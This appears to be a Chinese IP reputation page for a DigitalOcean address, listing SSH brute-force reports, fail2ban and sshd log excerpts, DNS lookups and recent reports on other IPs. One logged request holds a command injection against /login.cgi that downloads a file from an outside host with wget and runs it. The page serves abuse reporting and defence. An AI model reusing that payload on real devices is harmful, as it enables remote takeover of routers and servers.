必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States of America

运营商(isp): DigitalOcean LLC

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:
类型 评论内容 时间
attackspambots
SSH Login Bruteforce
2020-09-08 03:09:58
attackbots
Sep  7 12:26:05 MainVPS sshd[10732]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Sep  7 12:26:07 MainVPS sshd[10732]: Failed password for root from 142.93.246.42 port 47020 ssh2
Sep  7 12:30:04 MainVPS sshd[16861]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Sep  7 12:30:06 MainVPS sshd[16861]: Failed password for root from 142.93.246.42 port 46532 ssh2
Sep  7 12:33:51 MainVPS sshd[24197]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Sep  7 12:33:53 MainVPS sshd[24197]: Failed password for root from 142.93.246.42 port 46046 ssh2
...
2020-09-07 18:38:58
attackspambots
(sshd) Failed SSH login from 142.93.246.42 (US/United States/-): 5 in the last 3600 secs
2020-08-28 21:43:03
attackbots
invalid user
2020-08-28 15:27:02
attack
'Fail2Ban'
2020-08-24 09:25:39
attackspam
2020-08-22T08:15:33.389407vps751288.ovh.net sshd\[26569\]: Invalid user jana from 142.93.246.42 port 43498
2020-08-22T08:15:33.398096vps751288.ovh.net sshd\[26569\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
2020-08-22T08:15:35.118809vps751288.ovh.net sshd\[26569\]: Failed password for invalid user jana from 142.93.246.42 port 43498 ssh2
2020-08-22T08:19:33.967472vps751288.ovh.net sshd\[26595\]: Invalid user alexandra from 142.93.246.42 port 52482
2020-08-22T08:19:33.973702vps751288.ovh.net sshd\[26595\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
2020-08-22 14:40:16
attackbots
Aug 20 14:50:22 sso sshd[15567]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
Aug 20 14:50:24 sso sshd[15567]: Failed password for invalid user lfd from 142.93.246.42 port 45452 ssh2
...
2020-08-20 21:43:59
attackspambots
Cowrie Honeypot: 3 unauthorised SSH/Telnet login attempts between 2020-08-20T12:03:59Z and 2020-08-20T12:11:51Z
2020-08-20 20:11:59
attackspambots
2020-08-19T04:07:01.641367shield sshd\[24416\]: Invalid user lqx from 142.93.246.42 port 59456
2020-08-19T04:07:01.650018shield sshd\[24416\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
2020-08-19T04:07:03.669370shield sshd\[24416\]: Failed password for invalid user lqx from 142.93.246.42 port 59456 ssh2
2020-08-19T04:10:41.269912shield sshd\[24696\]: Invalid user admin from 142.93.246.42 port 39044
2020-08-19T04:10:41.278362shield sshd\[24696\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
2020-08-19 12:40:19
attack
Automatic Fail2ban report - Trying login SSH
2020-08-19 04:27:33
attackspam
fail2ban/Aug 15 01:39:24 h1962932 sshd[10329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Aug 15 01:39:26 h1962932 sshd[10329]: Failed password for root from 142.93.246.42 port 56728 ssh2
Aug 15 01:43:47 h1962932 sshd[10531]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Aug 15 01:43:49 h1962932 sshd[10531]: Failed password for root from 142.93.246.42 port 37618 ssh2
Aug 15 01:48:07 h1962932 sshd[13310]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Aug 15 01:48:09 h1962932 sshd[13310]: Failed password for root from 142.93.246.42 port 46740 ssh2
2020-08-15 08:57:53
attackbots
Aug  7 13:53:13 ovpn sshd\[15541\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Aug  7 13:53:16 ovpn sshd\[15541\]: Failed password for root from 142.93.246.42 port 50526 ssh2
Aug  7 13:58:57 ovpn sshd\[17913\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Aug  7 13:58:59 ovpn sshd\[17913\]: Failed password for root from 142.93.246.42 port 36444 ssh2
Aug  7 14:00:40 ovpn sshd\[18709\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
2020-08-08 03:10:29
attackspam
2020-08-04T14:33:10+0200 Failed SSH Authentication/Brute Force Attack. (Server 9)
2020-08-04 22:21:58
attackspam
Jul 28 00:44:41 gospond sshd[26578]: Invalid user liuziyuan from 142.93.246.42 port 55216
Jul 28 00:44:43 gospond sshd[26578]: Failed password for invalid user liuziyuan from 142.93.246.42 port 55216 ssh2
Jul 28 00:45:56 gospond sshd[26595]: Invalid user sxltzxkt from 142.93.246.42 port 42322
...
2020-07-28 07:51:31
attackbotsspam
$f2bV_matches
2020-07-27 01:10:48
attack
Jul 23 20:22:13 ns382633 sshd\[14117\]: Invalid user romulo from 142.93.246.42 port 37092
Jul 23 20:22:13 ns382633 sshd\[14117\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
Jul 23 20:22:14 ns382633 sshd\[14117\]: Failed password for invalid user romulo from 142.93.246.42 port 37092 ssh2
Jul 23 20:30:02 ns382633 sshd\[15175\]: Invalid user gitlab-runner from 142.93.246.42 port 40638
Jul 23 20:30:02 ns382633 sshd\[15175\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
2020-07-24 02:34:04
attackbotsspam
$f2bV_matches
2020-07-23 00:34:06
attackspambots
Jul 19 06:22:44 ny01 sshd[21270]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
Jul 19 06:22:46 ny01 sshd[21270]: Failed password for invalid user nor from 142.93.246.42 port 53458 ssh2
Jul 19 06:24:33 ny01 sshd[21449]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
2020-07-19 18:59:30
attackspam
2020-07-16T10:31:40+0200 Failed SSH Authentication/Brute Force Attack. (Server 10)
2020-07-16 18:10:09
attackbots
Jul  7 07:25:21 PorscheCustomer sshd[8035]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
Jul  7 07:25:23 PorscheCustomer sshd[8035]: Failed password for invalid user jessica from 142.93.246.42 port 40628 ssh2
Jul  7 07:28:44 PorscheCustomer sshd[8212]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
...
2020-07-07 16:14:23
attackspambots
SSH Bruteforce attack
2020-07-03 22:57:48
attackbots
2020-06-29T22:55:06.615667abusebot.cloudsearch.cf sshd[25556]: Invalid user gt from 142.93.246.42 port 50744
2020-06-29T22:55:06.620753abusebot.cloudsearch.cf sshd[25556]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
2020-06-29T22:55:06.615667abusebot.cloudsearch.cf sshd[25556]: Invalid user gt from 142.93.246.42 port 50744
2020-06-29T22:55:07.967600abusebot.cloudsearch.cf sshd[25556]: Failed password for invalid user gt from 142.93.246.42 port 50744 ssh2
2020-06-29T22:58:40.004605abusebot.cloudsearch.cf sshd[25734]: Invalid user ftw from 142.93.246.42 port 50858
2020-06-29T22:58:40.009666abusebot.cloudsearch.cf sshd[25734]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
2020-06-29T22:58:40.004605abusebot.cloudsearch.cf sshd[25734]: Invalid user ftw from 142.93.246.42 port 50858
2020-06-29T22:58:42.069002abusebot.cloudsearch.cf sshd[25734]: Failed password for invalid user ft
...
2020-06-30 07:59:21
attack
Jun 24 15:04:40 h1745522 sshd[28789]: Invalid user phil from 142.93.246.42 port 58670
Jun 24 15:04:40 h1745522 sshd[28789]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
Jun 24 15:04:40 h1745522 sshd[28789]: Invalid user phil from 142.93.246.42 port 58670
Jun 24 15:04:42 h1745522 sshd[28789]: Failed password for invalid user phil from 142.93.246.42 port 58670 ssh2
Jun 24 15:07:53 h1745522 sshd[28905]: Invalid user dai from 142.93.246.42 port 59036
Jun 24 15:07:53 h1745522 sshd[28905]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42
Jun 24 15:07:53 h1745522 sshd[28905]: Invalid user dai from 142.93.246.42 port 59036
Jun 24 15:07:55 h1745522 sshd[28905]: Failed password for invalid user dai from 142.93.246.42 port 59036 ssh2
Jun 24 15:11:05 h1745522 sshd[29179]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Jun 24
...
2020-06-24 21:43:30
attack
Jun 24 09:57:29 jumpserver sshd[198740]: Failed password for root from 142.93.246.42 port 44052 ssh2
Jun 24 10:00:46 jumpserver sshd[198783]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42  user=root
Jun 24 10:00:48 jumpserver sshd[198783]: Failed password for root from 142.93.246.42 port 45026 ssh2
...
2020-06-24 18:23:30
相同子网IP讨论:
IP 类型 评论内容 时间
142.93.246.239 attackspambots
ssh brute force
2020-03-09 13:52:17
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 142.93.246.42
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 38431
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;142.93.246.42.			IN	A

;; AUTHORITY SECTION:
.			408	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020062400 1800 900 604800 86400

;; Query time: 56 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Jun 24 18:23:23 CST 2020
;; MSG SIZE  rcvd: 117
HOST信息:
Host 42.246.93.142.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 42.246.93.142.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
71.6.233.145 attackspambots
" "
2019-07-15 05:39:52
151.30.31.201 attackspambots
151.30.31.201 - - [14/Jul/2019:23:17:40 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 166 "-" "ELEMENT/2.0"
...
2019-07-15 05:37:21
164.132.38.167 attack
Jul 15 03:00:50 vibhu-HP-Z238-Microtower-Workstation sshd\[24020\]: Invalid user quange from 164.132.38.167
Jul 15 03:00:50 vibhu-HP-Z238-Microtower-Workstation sshd\[24020\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.38.167
Jul 15 03:00:52 vibhu-HP-Z238-Microtower-Workstation sshd\[24020\]: Failed password for invalid user quange from 164.132.38.167 port 42959 ssh2
Jul 15 03:05:23 vibhu-HP-Z238-Microtower-Workstation sshd\[24200\]: Invalid user ingrid from 164.132.38.167
Jul 15 03:05:23 vibhu-HP-Z238-Microtower-Workstation sshd\[24200\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.38.167
...
2019-07-15 05:38:40
80.245.118.122 attackbotsspam
[portscan] Port scan
2019-07-15 06:08:33
128.199.143.163 attackspambots
Invalid user backup from 128.199.143.163 port 47860
2019-07-15 06:06:35
115.186.148.38 attackspam
Jul 14 23:29:06 eventyay sshd[7849]: Failed password for root from 115.186.148.38 port 12634 ssh2
Jul 14 23:34:55 eventyay sshd[9169]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=115.186.148.38
Jul 14 23:34:56 eventyay sshd[9169]: Failed password for invalid user dp from 115.186.148.38 port 10535 ssh2
...
2019-07-15 05:41:22
159.69.77.184 attackspam
masters-of-media.de 159.69.77.184 \[14/Jul/2019:23:16:49 +0200\] "POST /wp-login.php HTTP/1.1" 200 5855 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0"
masters-of-media.de 159.69.77.184 \[14/Jul/2019:23:16:50 +0200\] "POST /wp-login.php HTTP/1.1" 200 5810 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0"
masters-of-media.de 159.69.77.184 \[14/Jul/2019:23:16:50 +0200\] "POST /xmlrpc.php HTTP/1.1" 200 4102 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0"
2019-07-15 06:06:00
198.199.113.209 attackspambots
2019-07-14T21:17:33.303348abusebot-4.cloudsearch.cf sshd\[17177\]: Invalid user global from 198.199.113.209 port 35778
2019-07-15 05:42:00
118.24.219.111 attackspam
Jul 14 17:43:19 TORMINT sshd\[1851\]: Invalid user adv from 118.24.219.111
Jul 14 17:43:19 TORMINT sshd\[1851\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.219.111
Jul 14 17:43:21 TORMINT sshd\[1851\]: Failed password for invalid user adv from 118.24.219.111 port 58360 ssh2
...
2019-07-15 05:48:03
158.69.22.218 attackbots
Jul 14 23:30:48 eventyay sshd[8140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=158.69.22.218
Jul 14 23:30:49 eventyay sshd[8140]: Failed password for invalid user gregor from 158.69.22.218 port 49576 ssh2
Jul 14 23:35:31 eventyay sshd[9441]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=158.69.22.218
...
2019-07-15 05:51:34
200.172.91.170 attackbots
Jul 14 23:29:11 eventyay sshd[7852]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=200.172.91.170
Jul 14 23:29:13 eventyay sshd[7852]: Failed password for invalid user redis from 200.172.91.170 port 41139 ssh2
Jul 14 23:35:16 eventyay sshd[9421]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=200.172.91.170
...
2019-07-15 05:50:19
68.183.133.21 attackspam
Jul 14 23:42:36 giegler sshd[20289]: Invalid user henry from 68.183.133.21 port 54450
2019-07-15 05:59:46
14.98.4.82 attack
Jul 14 23:17:46 mout sshd[1668]: Invalid user testuser from 14.98.4.82 port 5129
2019-07-15 05:35:03
211.23.61.194 attack
Jul 15 02:59:57 vibhu-HP-Z238-Microtower-Workstation sshd\[23992\]: Invalid user nagios from 211.23.61.194
Jul 15 02:59:57 vibhu-HP-Z238-Microtower-Workstation sshd\[23992\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=211.23.61.194
Jul 15 02:59:59 vibhu-HP-Z238-Microtower-Workstation sshd\[23992\]: Failed password for invalid user nagios from 211.23.61.194 port 50220 ssh2
Jul 15 03:05:27 vibhu-HP-Z238-Microtower-Workstation sshd\[24212\]: Invalid user ma from 211.23.61.194
Jul 15 03:05:27 vibhu-HP-Z238-Microtower-Workstation sshd\[24212\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=211.23.61.194
...
2019-07-15 05:43:46
27.34.245.238 attackspambots
Invalid user mr from 27.34.245.238 port 40752
pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.34.245.238
Failed password for invalid user mr from 27.34.245.238 port 40752 ssh2
Invalid user marisa from 27.34.245.238 port 55124
pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.34.245.238
2019-07-15 05:36:48

最近上报的IP列表

78.90.247.14 112.215.210.141 240.124.169.197 195.146.59.157
35.196.75.48 220.191.229.133 140.138.221.79 103.205.129.171
66.186.7.124 1.131.102.211 200.108.240.59 214.133.12.137
218.243.161.3 161.47.74.106 15.226.249.21 110.4.14.81
103.142.21.118 242.97.73.245 159.8.49.95 103.131.71.96